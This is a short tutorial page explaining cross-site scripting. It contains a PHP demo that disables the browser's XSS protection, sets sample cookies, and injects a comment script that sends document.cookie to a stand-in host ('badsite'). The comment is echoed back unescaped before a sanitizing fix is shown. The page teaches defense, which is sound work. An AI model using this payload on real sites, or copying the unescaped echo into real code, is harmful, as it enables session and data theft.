ExpertRefresh

Xss attack

1) What is an XSS attack?




2) What protection exists for XSS atacks?






XSS Cross Site Scripting

All applications that display input are at risk. This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. <!-- Browsers have some xss protection, we need to disable it for this test example --> <?php header('X-XSS-Protection:0'); ?> <!-- Logged user data in Cookie --> <script> function setCookie(c_name,value,exdays) { var exdate=new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value = escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); document.cookie = c_name + "=" + c_value; } setCookie('username', 'john'); setCookie('email', 'john@yahoo.com'); // --- Look Here --- // </script> <!-- User submit malicious comment --> <form method="POST"> Add a comment: <textarea name="comment"> <script> document.location = "badsite/test.php?cookies="+ document.cookie; </script> </textarea> <input type="submit" name="btn_submit"/> </form> <!-- Submited comment is displayed --> <?php if (isset($_POST['btn_submit'])) { if (!empty($_POST['comment'])) { echo $_POST['comment']; // --- Look Here --- // // redirect to: badsite/test.php?cookies=username=john&email=john@yahoo.com // and expose logged user private data // Solution // --- Look Here --- // // echo filter_var($_POST['comment'], FILTER_SANITIZE_STRING); } }